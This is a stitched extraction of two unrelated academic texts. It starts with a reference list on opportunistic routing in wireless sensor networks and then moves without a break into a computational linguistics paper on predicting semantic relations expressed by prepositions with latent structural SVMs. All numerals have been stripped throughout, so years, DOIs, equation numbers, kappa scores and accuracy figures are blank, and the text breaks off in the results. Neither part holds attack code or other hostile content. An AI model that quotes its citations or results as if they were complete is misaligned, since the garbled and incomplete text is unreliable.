search algorithm. ieee sensors journal ( ): – . biswas s, morris r. . 
exor: opportunistic multi-hop routing for wireless net- works. acm sigcomm computer communication review ( ): – doi . / . . boukerche a, darehshoorzadeh a. . opportunistic routing in wireless networks: models, algorithms, and classifications. acm computing surveys (csur) ( ): – . bouachir o, mnaouer ab, touati f, crescini d. . opportunistic routing and data dissemination protocol for energy harvesting wireless sensor networks. in: th ifip international conference on new technologies, mobility and security (ntms). piscataway: ieee, – . chachulski s, jennings m, katti s, katabi d. . trading structure for randomness in wireless opportunistic routing. vol. . new york: acm. chakchouk n. . a survey on opportunistic routing in wireless communica- tion networks. ieee communications surveys & tutorials ( ): – doi . /comst. . . chithaluru p, tiwari r, kumar k. . areor–adaptive ranking based energy efficient opportunistic routing scheme in wireless sensor network. computer networks : – doi . /j.comnet. . . choudhury rr, vaidya nh. . mac-layer anycasting in ad hoc networks. acm sigcomm computer communication review ( ): – . coutinho rw, boukerche a. . opportunistic routing in underwater sensor networks: potentials, challenges and guidelines. in: paper presented at the th international conference on distributed computing in sensor systems (dcoss). darehshoorzadeh a, robson e, boukerche a. . toward a comprehensive model for performance analysis of opportunistic routing in wireless mesh networks. ieee transactions on vehicular technology ( ): – . eu za, tan h-p, seah wk. . opportunistic routing in wireless sensor networks powered by ambient energy harvesting. computer networks ( ): – doi . /j.comnet. . . . hasnain m, malik mh, aydin me. . an adaptive opportunistic routing scheme for reliable data delivery in wsns. in: proceedings of the nd international conference on future networks and distributed systems. hawbani a, wang x, sharabi y, ghannami a, kuhlani h, karmoshi s. . lora: load-balanced opportunistic routing for asynchronous duty-cycled wsn. ieee transactions on mobile computing ( ): – doi . /tmc. . . yee et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . / . http://dx.doi.org/ . /comst. . http://dx.doi.org/ . /j.comnet. . http://dx.doi.org/ . /j.comnet. . . http://dx.doi.org/ . /tmc. . http://dx.doi.org/ . /peerj-cs. jadhav p, satao r. . a survey on opportunistic routing protocols for wireless sensor networks. procedia computer science : – doi . /j.procs. . . . jain n, dongariya a, verma a. . comparative study of different types of relay selection scheme for cooperative wireless communication. in: international conference on information, communication, instrumentation and control (icicic). kafaie s, chen y, dobre oa, ahmed mh. . joint inter-flow network coding and opportunistic routing in multi-hop wireless mesh networks: a compre- hensive survey. ieee communications surveys & tutorials ( ): – doi . /comst. . . kannan g, raja tsr. . energy efficient distributed cluster head scheduling scheme for two tiered wireless sensor network. egyptian informatics journal ( ): – doi . /j.eij. . . . khan a, ali i, rahman au, imran m, mahmood h. . co-eeors: cooperative energy efficient optimal relay selection protocol for underwater wireless sensor networks. ieee access : – doi . /access. . . larsson p. . 
selection diversity forwarding in a multihop packet radio network with fading channel and capture. acm sigmobile mobile computing and communica- tions review ( ): – doi . / . . lee gy, haas zj. . simple, practical, and effective opportunistic routing for short- haul multi-hop wireless networks. ieee transactions on wireless communications ( ): – doi . /twc. . . . li b, li h, zhang r, wei c. . an energy-efficient metric for relay selection in large- scale multi-hop wireless networks. in: paper presented at the international conference on computing, networking and communications (icnc). liang jz. . a reliable trust computing mechanism based on multi-source feed- back and fog computing in social sensor cloud. eee internet of things journal : – . liang w, luo j, xu x. . network lifetime maximization for time-sensitive data gathering in wireless sensor networks with a mobile sink. wireless communications and mobile computing ( ): – doi . /wcm. . luo j, hu j, wu d, li r. . opportunistic routing algorithm for relay node se- lection in wireless sensor networks. ieee transactions on industrial informatics ( ): – doi . /tii. . . mao x, tang s, xu x, li x, ma h. . energy-efficient opportunistic routing in wire- less sensor. ieee transactions on parallel and distributed systems ( ): – doi . /tpds. . . menon vg. . review on opportunistic routing protocols for dynamic ad hoc networks: taxonomy, applications and future research directions. preprints . doi . /preprints . .v . nadar c, patil r, raut s, mhatre k. . energy efficient optimal opportunistic routing using sleep mode for wireless sensor network. in: international conference on innovations in information, embedded and communication systems (iciiecs). yee et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /j.procs. . . http://dx.doi.org/ . /comst. . http://dx.doi.org/ . /j.eij. . . http://dx.doi.org/ . /access. . http://dx.doi.org/ . / . http://dx.doi.org/ . /twc. . . http://dx.doi.org/ . /wcm. http://dx.doi.org/ . /tii. . http://dx.doi.org/ . /tpds. . http://dx.doi.org/ . /preprints . .v http://dx.doi.org/ . /peerj-cs. raman a, sharma s. . optimization of communication parameters in wireless sensor network. in: communication and computing systems: proceedings of the international conference on communication and computing systems (icccs ), gurgaon, india, – september, . ren j, zhang y, zhang k, liu a, chen j, shen xs. . lifetime and energy hole evolution analysis in data-gathering wireless sensor networks. ieee transactions on industrial informatics ( ): – doi . /tii. . . ritter fe, schoelles mj, quigley ks, klein lc. . human-in-the-loop simulations. cham: springer, – . thakkar a. a. alive nodes based improved low energy adaptive clustering hierarchy for wireless sensor network. in: advanced computing, networking and informatics. new york city: springer, cham. thakkar a. b. cluster head election for energy and delay constraint applications of wireless sensor network. ieee sensors journal : – . thakkar a. . a new bollinger band based energy efficient routing for clustered wireless sensor network. applied soft computing : – . thakkar a. . kip: a novel self-guided adaptive clustering approach to prolong lifetime of wireless sensor networks. in: communication and computing systems: proceedings of the international conference on communication and computing systems (icccs ). thakkar a. . deal: distance and energy based advanced leach protocol. 
in: international conference on information and communication technology for intelligent systems. new york city: springer. wang tz. . data collection from wsns to the cloud based on mobile fog elements. amsterdam, netherlands: elsevier. zhai z, qian j, tao y, zhao l, cheng b. . poster: a lightweight timestamp-based mac detection scheme for xor network coding in wireless sensor networks. in: paper presented at the proceedings of the th annual international conference on mobile computing and networking. zhang x, tao l, yan f, sung dk. . shortest-latency opportunistic routing in asynchronous wireless sensor networks with independent duty-cycling. ieee transactions on mobile computing : – . zhao z, mosler b, braun t. . performance evaluation of opportunistic routing protocols: a framework-based approach using omnet++. in: proceedings of the th latin american networking conference. – . zorzi m, rao rr. . geographic random forwarding (geraf) for ad hoc and sensor networks: energy and latency performance. ieee transactions on mobile computing ( ): – doi . /tmc. . . yee et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /tii. . http://dx.doi.org/ . /tmc. . http://dx.doi.org/ . /peerj-cs. transactions of the association for computational linguistics, ( ) – . action editor: noah smith. submitted / ; revised / ; published / . c© association for computational linguistics. modeling semantic relations expressed by prepositions vivek srikumar and dan roth university of illinois, urbana-champaign urbana, il. . {vsrikum , danr}@illinois.edu abstract this paper introduces the problem of predict- ing semantic relations expressed by preposi- tions and develops statistical learning models for predicting the relations, their arguments and the semantic types of the arguments. we define an inventory of relations, build- ing on the word sense disambiguation task for prepositions and collapsing related senses across prepositions. given a preposition in a sentence, our computational task to jointly model the preposition relation and its argu- ments along with their semantic types, as a way to support the relation prediction. the an- notated data, however, only provides labels for the relation label, and not the arguments and types. we address this by presenting two mod- els for preposition relation labeling. our gen- eralization of latent structure svm gives close to % accuracy on relation labeling. further, by jointly predicting the relation, arguments, and their types along with preposition sense, we show that we can not only improve the re- lation accuracy, but also significantly improve sense prediction accuracy. introduction this paper addresses the problem of predicting se- mantic relations conveyed by prepositions in text. prepositions express many semantic relations be- tween their governor and object. predicting these can help advancing text understanding tasks like question answering and textual entailment. consider the sentence: ( ) the book of prof. alexander on primary school methods is a valuable teaching resource. here, the preposition on indicates that the book and primary school methods are connected by the relation topic and of indicates the creator- creation relation between prof. alexander and the book. predicting these relations can help answer questions about the subject of the book and also rec- ognize the entailment of sentences like prof. alexan- der has written about primary school methods. 
being highly polysemous, the same preposition can indicate different kinds of relations, depending on its governor and object. furthermore, several prepositions can indicate the same semantic relation. for example, consider the sentence: ( ) poor care led to her death from pneumonia. the preposition from in this sentence expresses the relation cause(death, pneumonia). in a differ- ent context, it can denote other relations, as in the phrases copied from the film (source) and recog- nized from the start (temporal). on the other hand, the relation cause can be expressed by sev- eral prepositions; for example, the following phrases express a cause relation: died of pneumonia and tired after the surgery. we characterize semantic relations expressed by transitive prepositions and develop accurate models for predicting the relations, identifying their argu- ments and recognizing the semantic types of the ar- guments. building on the word sense disambigua- tion task for prepositions, we collapse semantically related senses across prepositions to derive our re- lation inventory. these relations act as predicates in a predicate-argument representation, where the arguments are the governor and the object of the preposition. while ascertaining the arguments is a largely syntactic decision, we point out that syn- tactic parsers do not always make this prediction correctly. however, as illustrated in the examples above, identifying the relation depends on the gov- ernor and object of the preposition. given a sentence and a preposition, our goal is to model the predicate (i.e. the preposition rela- tion) and its arguments (i.e. the governor and ob- ject). very often, the relation label is not influenced by the surface form of the arguments but rather by their semantic types. in sentence ( ) above, we want the predicate to be cause when the object of the preposition is any illness. we thus suggest to model the argument types along with the preposi- tion relations and arguments, using different notions of types. these three related aspects of the rela- tion prediction task are further explained in section leading up to the problem definition. though we wish to predict relations, arguments and types, there is no corpus which annotates all three. the semeval shared task of word sense disambiguation for prepositions provides sense an- notations for prepositions. we use this data to gen- erate training and test corpora for the relation la- bels. in section , we present two models for the prepositional relation identification problem. the first model considers all possible argument candi- dates from various sources along with all argument types to predict the preposition relation label. the second model treats the arguments and types as la- tent variables during learning using a generalization of the latent structural svm of (yu and joachims, ). we show in section that this model not only predicts the arguments and types, but also im- proves relation prediction performance. the primary contributions of this paper are: . we introduce a new inventory of preposition relations that covers the prepositions that formed the basis of the semeval task of preposition sense disambiguation. . we model preposition relations, arguments and their types jointly and propose a learning algo- rithm that learns to predict all three using train- ing data that annotates only relation labels. . 
we show that jointly predicting relations with word sense not only improves the relation pre- dictor, but also gives a significant improvement in sense prediction. prepositions & predicate-argument semantics semantic role labeling (cf. (gildea and jurafsky, ; palmer et al., ; punyakanok et al., ) and others) is the task of converting text into a predicate-argument representation. given a trigger word or phrase in a sentence, this task solves two related prediction problems: (a) identifying the rela- tion label, and (b) identifying and labeling the argu- ments of the relation. this problem has been studied in the con- text of verb and nominal triggers using the prop- bank (palmer et al., ) and nombank (meyers et al., ) annotations over the penn treebank, and also using the framenet lexicon (fillmore et al., ), which allows arbitrary words to trigger semantic frames. this paper focuses on semantic relations ex- pressed by transitive prepositions . we can define the two prediction tasks for prepositions as follows: identifying the relation label for a preposition, and predicting the arguments of the relation. preposi- tions can mark arguments (both core and adjunct) for verbal and nominal predicates. in addition, they can also trigger relations that are not part of other predicates. for example, in sentence ( ) below, the prepositional phrase starting with to is an argument of the verb visit, but the in triggers an independent relation indicating the location of the aquarium. ( ) the children enjoyed the visit to the aquarium in coney island. framenet covers some prepositional relations, but allows only temporal, locative and directional senses of prepositions to evoke frames, accounting for only % of the targets in the semeval shared task of framenet parsing. in fact, the state-of-the-art framenet parser of (das et al., ) does not con- sider any frame inducing prepositions. (baldwin et al., ) highlights the importance of studying prepositions for a complete linguistic by transitive prepositions we refer to the standard usage of prepositions that take an object. in particular, we do not con- sider prepositional particles in our analysis. analysis of sentences and surveys work in the nlp literature that addresses the syntax and semantics of prepositions. one line of work (ye and bald- win, ) addressed the problem of preposition semantic role labeling by considering prepositional phrases that act as arguments of verbs according to the propbank annotation. they built a system that predicts the labels of these prepositional phrases alone. however, by definition, this covered only verb-attached prepositions. (zapirain et al., ) studied the impact of automatically learned selec- tional preferences for predicting arguments of verbs and showed that modeling prepositional phrases sep- arately improves the performance of argument pre- diction. preposition semantics has also been studied via the preposition project (litkowski and har- graves, ) and the related semeval shared task of word sense disambiguation of prepositions (litkowski and hargraves, ). the preposi- tion project identifies preposition senses based on their definitions in the oxford dictionary of english. there are different labels to be predicted with a wide variance in the number of senses per preposi- tion ranging from (during and as) to (on). for example, according to the preposition sense inven- tory, the preposition from in sentence ( ) above will be labeled with the sense from: ( ) to indicate a cause. 
(dahlmeier et al., ) added sense anno- tation to seven prepositions in four sections of the penn treebank with the goal of studying their inter- action with verb arguments. using the semeval data, (tratz and hovy, ) and (hovy et al., ) showed that the arguments offer an important cue to identify the sense of the preposition and (tratz, ) showed further im- provements by refining the sense inventory. how- ever, though these works used a dependency parser to identify arguments, in order to overcome parsing errors, they augment the parser’s predictions using part-of-speech based heuristics. we argue that, while disambiguating the sense of a preposition does indeed reveal nuances of its meaning, it leads to a proliferation of labels to be predicted. most importantly, sense labels do not transfer to other prepositions that express the same meaning. for example, both finish lunch before noon and finish lunch by noon express a temporal relation. according to the preposition project, the sense label for the first preposition is before: ( ), and that for the second is by: ( ). this both de- feats the purpose of identifying the relations to aid natural language understanding and makes the pre- diction task harder than it should be: using the stan- dard word sense classification approach, we need to train a separate classifier for each word because the labels are defined per-preposition. in other words, we cannot share features across the different prepo- sitions. this motivates the need to combine such senses of prepositions into the same class label. in this direction, (o’hara and wiebe, ) de- scribes an inventory of preposition relations ob- tained using penn treebank function tags and frame elements from framenet. (srikumar and roth, ) merged preposition senses of seven preposi- tions into relation labels. (litkowski, ) also suggests collapsing the definitions of prepositions into a smaller set of semantic classes. to aid bet- ter generalization and to reduce the label complex- ity, we follow this line of work to define a set of rela- tion labels which abstract word senses across prepo- sitions . preposition-triggered relations this section describes the inventory of preposition relations introduced in this paper, and then identifies the components of the preposition relation extraction problem. . preposition relation inventory we build our relation inventory using the sense an- notation in the preposition project, focusing on the prepositions annotated for the semeval- shared task of preposition sense disambiguation. as discussed in section , we construct the in- ventory of preposition relations by collapsing se- mantically related preposition senses across differ- since the preposition sense data is annotated over framenet sentences, sense annotation can be used to extend framenet (litkowski, ). we believe that the abstract la- bels proposed in this paper can further help in this effort. we consider the following prepositions: about, above, across, after, against, along, among, around, as, at, before, be- hind, beneath, beside, between, by, down, during, for, from, in, inside, into, like, of, off, on, onto, over, round, through, to, to- wards, and with. this does not include multi-word prepositions such as because of and due to. ent prepositions. for each sense that is defined, the preposition project also specifies related prepo- sitions. these definitions and related prepositions provide a starting point to identify senses that can be merged across prepositions. 
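the end product of this merging is a many-to-one map from per-preposition sense labels to shared relation labels, which is what later allows the sense-annotated semeval data to be relabeled automatically; a minimal sketch in python (the sense identifiers below are hypothetical placeholders, not actual inventory entries):

# hypothetical per-preposition sense identifiers mapped onto shared relation labels
SENSE_TO_RELATION = {
    ("from", "4(1)"): "cause",
    ("of", "6(2)"): "cause",
    ("before", "1(1)"): "temporal",
    ("by", "5(3)"): "temporal",
}

def relabel(preposition, sense):
    """turn a per-preposition sense annotation into a relation label;
    senses not covered by this sketch fall back to the overflow label."""
    return SENSE_TO_RELATION.get((preposition, sense), "other")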
we followed this with a manual cleanup phase. some senses do not cleanly align with a single relation because the def- initions include idiomatic or figurative usage. for example, the sense in: ( ) of the preposition in, ac- cording to the definition, includes both spatial and figurative notions of the spatial sense (that is, both in london and in a film). in such cases, we sam- pled examples from the semeval training set and assigned the relation label based on majority. if sufficient examples could not be sampled, these senses were added to the label other, which is not a semantically coherent category and represents the ‘overflow’ case. overall, we have labels, which are listed in table . a companion publication (available on the authors’ website) provides detailed definitions of each relation and the senses that were merged to create each label. since we define relations to be groups of preposition sense labels, each sense can be uniquely mapped to a relation label. hence, we can use the annotated sense data from semeval to obtain a corpus of relation-labeled sentences. to validate the labeling scheme, two native speak- ers of english annotated sentences from the semeval training corpus using only the definitions of the labels as the annotation guidelines. we mea- sured cohen’s kappa coefficient (cohen, ) be- tween the annotators to be . and also between each annotator and the original corpus to be . and . respectively. . preposition relation extraction the input to the prediction problem consists of a preposition in a sentence and the goal is to jointly model the following: (i) the relation expressed by the preposition, and (ii) the arguments of the rela- tion, namely the governor and the object. we use sentence ( ) in the introduction as our run- ning example the following discussion. in our run- note that, even though we do not consider intransitive prepositions, the definitions of some relations in table could be extended apply to prepositional particles such drive down (direction) and run about (manner). relation name example activity good at boxing agent opened by annie attribute walls of stone beneficiary fight for napoleon cause died of cancer co-participants pick one among these destination leaving for london direction drove towards the border endstate driven to tears experiencer warm towards her instrument cut with a knife journey travel by road location living in london manner scream like an animal mediumofcommunication new show on tv numeric increase by % objectofverb murder of the boys opponent/contrast fight with him other all others participant/accompanier steak with wine partwhole member of gang physicalsupport lean against the wall possessor son of a friend professionalaspect works in publishing purpose tools for making it recipient unkind to her separation ousted from power source purchased from the shop species city of prague startstate recover from illness temporal arrived on monday topic books on shakespeare table : list of preposition relations ning example, the relation label is cause. we rep- resent the predicted relation label by r. arguments the relation label crucially depends on correctly identifying the arguments of the prepo- sition, which are death and pneumonia in our run- ning example. while a parser can identify the argu- ments of a preposition, simply relying on the parser may impose an upper limit on the accuracy of rela- tion prediction. we build an oracle experiment to highlight this limitation. 
table shows the recall of the easy-first dependency parser of (goldberg and elhadad, ) on section of the penn treebank for identifying the governor and object of prepositions. we define heuristics that generate a candidate governors and objects for a preposition. for the gov- ernor, this set includes the previous verb or noun and for the object, it includes only the next noun. the row labeled best(parser, heuristics) shows the performance of an oracle predictor which selects the true governor/object if present among the parser’s prediction and the heuristics. we see that, even for the in-domain case, if we are able to re-rank the can- didates, we could achieve a big improvement in ar- gument identification. recall governor object parser . . best(parser, heuristics) . . table : identifying governor and object of prepositions in the penn treebank data. here, best(parser, heuris- tics) reports the performance of an oracle that picks the true governor and object, if present among the candidates presented by the parser and the heuristic. this presents an in-domain upper bound for governor and object detec- tion. see text for further details. to overcome erroneous parser decisions, we en- tertain governor and object candidates proposed both by the parser and the heuristics. in the follow- ing discussion, we denote the chosen governor and object by g and o respectively. argument types while the primary purpose of this work is to model preposition relations and their arguments, the relation prediction is strongly depen- dent on the semantic type of the arguments. to il- lustrate this, consider the following incomplete sen- tence: the message was delivered at · · · . this preposition can express both a temporal or a location relation depending on the object (for ex- ample, noon vs. the doorstep). (agirre et al., ) shows that modeling the se- mantic type of the arguments jointly with attachment can improve pp attachment accuracy. in this work, we point out that argument types should be modeled jointly with both aspects of the problem of preposi- tion relation labeling. types are an abstraction that capture common properties of groups of entities. for example, word- net provides generalizations of words in the form of their hypernyms. in our running example, we wish to generalize the relation label for death from pneu- monia to include cases such as suffering from flu. figure shows the hypernym hierarchy for the word pneumonia. in this case, synsets in the hypernym hierarchy, like pathological state or physical condi- tion, would also include ailments like flu. pneumonia => respiratory disease => disease => illness => ill health => pathological state => physical condition => condition => state => attribute => abstraction => entity figure : hypernym hierarchy for the word pneumonia we define a semantic type to be a cluster of words. in addition to wordnet hypernyms, we also cluster verbs, nouns and adjectives using the dependency- based word similarity of (lin, ) and treat cluster membership as types. these are described in detail in section . . relation prediction involves not only identifying the arguments, but also selecting the right semantic type for them, which together, help predicting the relation label. given an argument candidate and a collection of possible types (given by wordnet or the similarity based clusters), we need to select one of the types. for example, in the wordnet case, we need to pick one of the hypernyms in the hypernym hierarchy. 
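gathering the wordnet candidates is mechanical; a minimal sketch using nltk's wordnet interface (nltk and the fixed depth cut-off are assumptions of this sketch, not tools prescribed by the paper):

from nltk.corpus import wordnet as wn

def hypernym_candidates(word, max_depth=4):
    """collect hypernym synsets of all senses of `word`, up to a fixed depth."""
    candidates = set()
    for synset in wn.synsets(word):
        frontier = [synset]
        for _ in range(max_depth):
            frontier = [h for s in frontier for h in s.hypernyms()]
            candidates.update(s.name() for s in frontier)
    return candidates

# hypernym_candidates("pneumonia") includes synsets such as respiratory disease
# and disease, which also cover related ailments like flu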
thus, for the governor and object, we have a set of type labels, comprised of one element for each type category. we denote this by tg (gover- nor type) and to (object type) respectively. . problem definition the input to our prediction task is a preposition in a sentence. our goal is to jointly model the relation it expresses, the governor and the object of the rela- tion and the types of each argument (both wordnet hypernyms and cluster membership). we denote the input by x, which consists not only of the prepo- sition but also a set of candidates for the governor and the object and, for each type category, the list of types for the governor and candidate. the prediction, which we denote by y, consists of the relation r, which can be one of the valid re- lation labels in table and the governor and object, denoted by g and o, each of which is one of text seg- ments proposed by the parser or the heuristics. ad- ditionally, y also consists of type predictions for the governor and object, denoted by tg and to respec- tively, each of which is a vector of labels, one for each type category. table summarizes the nota- tion described above. we refer to the ith element of vectors using subscripts and use the superscript ∗ to denote gold labels. recall that we have gold labels only for the relation labels and not for arguments and their types. symbol meaning x input (pre-processed sentence and preposition) r relation label for the preposition g,o governor and object of the relation tg,to vectors of type assignments for governor and object respectively y full structure (r,g,o,tg,to) table : summary of notation learning preposition relations a key challenge in modeling preposition relations is that our training data only annotates the relation la- bels and not the arguments and types. in this section, we introduce two approaches for predicting preposi- tion relations using this data. . feature representation we use the notation Φ(x,y) to indicate the feature function for an input x and the full output y. we build Φ using the features of the components of y: . arguments: for g and o, which represent an assignment to the governor and object, we de- note the features extracted from the arguments as φa(x,g) and φa(x,o) respectively. . types: given a type assignment tgi to the i th type category of the governor, we define fea- tures φt (x,g,t g i ). similarly, we define features φt (x,o,t o i ) for the types of the object. we combine the argument and their type features to define the features for classifying the relation, which we denote by φ(x,g,o,tg,to): φ = ∑ a∈{g,o} ( φa(x,a) + ∑ i φt (x,a,t a i ) ) ( ) section describes the actual features used in our experiments. observe that given the arguments and their types, the task of predicting relations is simply a multiclass classification problem. thus, following the standard convention for multiclass classification, the overall feature representation for the relation and argument prediction is defined by conjoining the relation r with features for the corresponding arguments and types, φ. this gives us the full feature representa- tion, Φ(x,y). . model : predicting only relations the first model aims at predicting only the rela- tion labels and not the arguments and types. this falls into the standard multiclass classification set- ting, where we wish to predict one of labels. 
to do so, we sum over all the possible assignments to the rest of the structure and define features for the inputs as φ̂(x) = ∑ g,o,tg,to φ(x,g,o,tg,to) ( ) effectively, doing so uses all the governor and ob- ject candidates and all their semantic types to get a feature representation for the relation classifica- tion problem. once again, for a relation label r, the overall feature representation is defined by conjoin- ing the relation r with the features for that relation φ̂, which we write as φr(x,r). note that this sum- mation is computationally inexpensive in our case because the sum decomposes according to equation ( ). with a learned weight vector w, the relation label is predicted as r = arg max r′ wt φr(x,r ′) ( ) we use a structural svm (tsochantaridis et al., ) to train a weight vector w that predicts the re- lation label as above. the training is parameterized by c, which represents the tradeoff between gener- alization and the hinge loss. . model : learning from partial annotations in the second model, even though our annotation does not provide gold labels for arguments and types, our goal is to predict them. at inference time, if we had a weight vector w, we could predict the full structure using inference as follows: y = arg max y′ wt Φ(x,y) ( ) we propose an iterative learning algorithm to learn this weight vector. in the following discussion, for a labeled example (x,y∗), we refer to the missing part of its structure as h(y∗). that is, h(y∗) is the assignment to the arguments of the relation and their types. we use the notation r(y) to denote the relation label specified by a structure y. our learning algorithm is closely related to re- cently developed latent variable based frameworks (yu and joachims, ; chang et al., a; chang et al., b), where the supervision provides only partial annotation. we begin by defining two addi- tional inference procedures: . latent inference: given a weight vector w and a partially labeled example (x,y∗), we can ‘complete’ the rest of the structure by infer- ring the highest scoring assignment to the miss- ing parts. in the algorithm, we call this pro- cedure latentinf(w,x,y∗), which solves the following maximization problem: ŷ = arg maxy w t Φ(x,y), ( ) s.t. r(y) = r(y∗). . loss augmented inference: this is a variant of the the standard loss augmented inference for structural svms, which solves the follow- ing maximization problem for a given x and fully labeled y∗: arg max y wt Φ(x,y) + ∆(y,y∗) ( ) here, ∆(y,y∗) denotes the loss function. in the standard structural svms, the loss is over the entire structure. in the latent structural svm formulation of (yu and joachims, ), the loss is defined only over the part of the structure with the gold label. in this work, we use the standard hamming loss over the entire structure, but scale the loss for the elements of h(y) by a parameter α < . this is a gen- eralization of the latent structural svm, which corresponds to the setting α = . the intu- ition behind having a non-zero α is that in ad- dition to penalizing the learning algorithm if it violates the annotated part of the structure, we also incorporate a small penalty for the rest of the structure. using these two inference procedures, we define the learning algorithm as algorithm . the weight vector is initialized using model . the algorithm then finds the best arguments and types for all ex- amples in the training set (steps - ). 
doing so gives an estimate of the arguments and types for each example, giving us ‘fully labeled’ structured data. the algorithm then proceeds to use this data to train a new weight vector using the standard struc- tural svm with the loss augmented inference listed above (step ). these two steps are repeated several times. note that as with the summation in model , solving the inference problems described above is computationally inexpensive. algorithm algorithm for learning model input: examples d = {xi,r(y∗i )}, where exam- ples are labeled only with the relation labels. : initialize weight vector w using model : for t = , , · · · do : for (xi,y∗i ) ∈ d do : ŷi ← latentinf(w,xi,y∗i ) (eq. ) : end for : w ← learnssv m({xi, ŷi}) with the loss augmented inference of eq. : end for : return w algorithm is parameterized by c and α. the parameter α controls the extent to which the hypoth- esized labels according to the previous iteration’s weight vector influence the learning. . joint inference between preposition senses and relations by defining preposition relations as disjoint sets of preposition senses, we effectively have a hierarchi- cal relationship between senses and relations. this suggests that joint inference can be employed be- tween sense and relation predictions with a validity constraint connecting the two. the idea of employ- ing inference to combine independently trained pre- dictors to obtain a coherent output structure has been used for various nlp tasks in recent years, starting with the work of (roth and yih, ; roth and yih, ). we use the features defined by (hovy et al., ), which we write as φs(x,s) for a given input x and sense label s, and train a separate preposition sense model on the semeval data with features φs(x,s) using the structural svm algorithm. thus, we have two weight vectors – the one for predicting preposi- tion relations described earlier, and the preposition sense weight vector. at prediction time, for a given input, we find the highest scoring joint assignment to the relation, arguments and types and the sense, sub- ject to the constraint that the sense and the relation agree according to the definition of the relations. experiments and results the primary research goal of our experiments is to evaluate the different models (model , model and joint relation-sense inference) for predicting prepo- sition relations. in additional analysis experiments, we also show that the definition of preposition rela- tions indeed captures cross-preposition semantics by taking advantage of shared features and also high- light the need for going beyond the syntactic parser. . types and features types as described in section , we use wordnet hypernyms as one of the type categories. we use all hypernyms within four levels in the hypernym hier- archy for all senses. the second type category is defined by word- similarity driven clusters. we briefly describe the clustering process here. the thesaurus of (lin, ) specifies similar lexical items for a given word along with a similarity score from to . it treats nouns, verbs and adjectives separately. we use the score to cluster groups of similar words us- ing a greedy set-covering approach. specifically, we randomly select a word which is not yet in a cluster as the center of a new cluster and add all words whose score is greater than σ to it. we re- peat this process till all words are in some clus- ter. a word can appear in more than one cluster because all words similar to the cluster center are added to the cluster. 
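this set-covering step is compact enough to sketch directly; a minimal version in python, assuming the thesaurus has been loaded into a dictionary sim that maps each word to its list of (neighbour, score) pairs:

import random

def cluster_words(sim, sigma):
    """greedy set covering: grow clusters around randomly chosen unclustered centers."""
    clusters = []
    unclustered = set(sim)
    while unclustered:
        center = random.choice(sorted(unclustered))
        members = {center} | {w for w, score in sim[center] if score > sigma}
        clusters.append(members)
        # a word may end up in several clusters, but only words not yet in any
        # cluster can become centers, so the loop terminates
        unclustered -= members
    return clusters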
we repeat this process for σ ∈{ . , . , . , . , . , . }. by increas- ing the value of σ, the clusters become more selec- tive and hence smaller. table shows example noun clusters created using σ = . . for a given word, identifiers for clusters to which the word belongs serve as type label candidates for this type category . features our argument features, denoted by φa in section . , are derived from the preposition sense feature set of (hovy et al., ) and extract the following from the argument: . word, part-of- speech, lemma and capitalization indicator, . con- flated part-of-speech (one of noun, verb, adjective, adverb, and other), . indicator for existence in wordnet, . wordnet synsets for the first and all senses, . wordnet lemma, lexicographer file names and part, member and substance holonyms, . roget thesaurus divisions for the word, . the first and last two and three letters, and . indicators for known af- fixes. our type features (φt ) are simply indicators for the type label, conjoined with the type category. one advantage of abstracting word senses into re- lations is that we can share features across different prepositions. the base feature set (for both types and arguments) defined above does not encode in- formation about the preposition to be classified. we do so by conjoining the features with the preposi- tion. in addition, since the relation labels are shared across all prepositions, we include the base features as a shared representation between prepositions. we consider two variants of our feature sets. we refer to the features described above as the typed features. in addition, we define the typed+gen features by conjoining argument and type features of typed with the name of the genera- tor that proposes the argument. recall that governor candidates are proposed by the dependency parser, or by the heuristics described earlier. hence, for the clusters can be downloaded from the authors’ website. jimmy carter; ronald reagan; richard nixon; george bush; lyndon johnson; richard m. nixon; gerald ford metalwork; porcelain; handicraft; jade; bronzeware; carving; pottery; ceramic; earthenware; jewelry; stoneware; lacquerware degradation; erosion; pollution; logging; desertification; siltation; urbanization; felling; poaching; soil erosion; depletion; water pollution; deforestation expert; wall street analyst; analyst; economist; telecommunications analyst; strategist; media analyst fox news channel; nbc news; msnbc; fox news; cnbc; cnnfn; c-span tuesdays; wednesdays; weekday; mondays; fridays; thursdays; sundays; saturdays table : examples of noun clusters generated using the set-covering approach for σ = . a governor, the typed+gen features would conjoin the corresponding typed features with one of parser, previous-verb, previous-noun, previous-adjective, or previous-word. . experimental setup and data all our experiments are based on the sem- eval data for preposition sense disambigua- tion (litkowski and hargraves, ) comprising word sense annotation over training and examples of prepositions labeled with their senses. we pre-processed sentences with part-of- speech tags using the illinois pos tagger and de- pendency graphs using the parser of (goldberg and elhadad, ) . for the experiments described be- low, we used the relation-annotated training set to train the models and evaluate accuracy of prediction on the test set. we chose the structural svm parameter c using five-fold cross-validation on a random exam- ples chosen from the training set. 
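the conjunction scheme described above, which shares features across prepositions, amounts to keeping two copies of every base feature, one tied to the preposition and one shared; a one-function sketch over a hypothetical dictionary of base features:

def conjoin_with_preposition(base_feats, preposition):
    """preposition-specific copies plus the shared, un-conjoined copies."""
    specific = {preposition + "|" + name: value for name, value in base_feats.items()}
    return {**specific, **base_feats}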
for model , we picked α = . using a validation set consisting of a separate set of training examples. we ran algorithm for rounds. predicting the most frequent relation for a prepo- sition gives an accuracy of . %. even though the performance of the most-frequent relation label is poor, it does not represent the problem’s difficulty and is not a good baseline. to compare, for prepo- sition senses, using features from the neighboring words, (ye and baldwin, ) obtained an accuracy of . %, and with features designed for the prepo- sition sense task, (hovy et al., ) get up to . % accuracy for the task. our re-implementation of the latter system using a different set of pre-processing tools gets an accuracy of . %. for preposition relations, our baseline system for we used the curator (clarke et al., ) for all pre- processing. relation labeling uses the typed feature set, but with- out any type information. this produces an accuracy of . % with model and . % with model . we report statistical significance of results using our implementation of dan bikel’s stratified-shuffling based statistical significance tester . . main results: relation prediction our main result, presented in table , compares the baseline model (without types) against other sys- tems, using both models described in section . first, we see that adding type information (typed) improves performance over the baseline. expand- ing the feature space (typed+gen) gives further im- provements. finally, jointly predicting the relations with preposition senses gives another improvement. setting accuracy model model no types . . typed . . typed+gen . ∗ . ∗ joint typed+gen & sense . ∗ . ∗† table : main results: accuracy of relation labeling. results in bold are statistically significant (p < . ) 